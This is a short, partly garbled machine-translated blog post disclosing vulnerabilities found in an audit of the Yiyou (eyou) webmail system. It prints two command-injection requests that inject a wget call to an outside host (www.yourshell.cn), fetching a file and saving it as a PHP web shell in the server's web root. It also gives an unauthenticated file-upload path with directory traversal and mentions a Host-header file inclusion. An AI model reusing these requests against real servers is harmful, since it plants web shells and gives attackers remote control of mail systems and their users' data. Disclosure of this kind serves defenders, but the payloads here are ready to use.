Code Auditing: Two getshells and two interesting vulnerabilities in the eyou email system

Code Auditing: Two getshells and two interesting vulnerabilities in the eyou email system

Recently, I conducted a penetration test on a company with a market value of over 10 billion US dollars. I found that one of the domain names uses the Yiyou mail system and I checked the source code of Yiyou mail, I found that the security of this system was still in the last few years. There were a lot of problems. I found some getshells and listed them in two simple columns. Then I screwed up two slightly interesting vulnerabilities and shared them. I didn't want to write a detailed analysis.
In addition, a new version of the Code audit system will be updated over a period of time. Several vulnerability types of audit rules will be added, and false positives will be optimized.All vulnerabilities detected by Yiyou are automatically discovered by the Seay source code audit system.


Command Execution 1
Http://host.com/swfupload/upload_files.php? Uid = | wget + http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=




Command Execution 2
 

GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1Host: mail.host.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Length: 0cookie: cookie=admin 1DNT: 1Connection: keep-alive

Arbitrary File Upload
Swfupload/upload_files.php? Uid = admin & token = youtoken /../../



In this case, you can directly upload any file without logging in. However, in linux, The is_dir () function checks whether a path is a directory .. /When redirecting to a directory, all directories in the path must exist, but in windows, there may be a non-existent path, whether it is a system problem or a php problem. This will take time to study again.
Look at the figure and you will understand.



Many files are contained in one file at the top of the head, but it is the host field in the http header. This host can be forged by default on websites, but there cannot be a slash that does not exist in this domain name. Otherwise, the error 400 will occur. Therefore, only files in the same directory can be included here.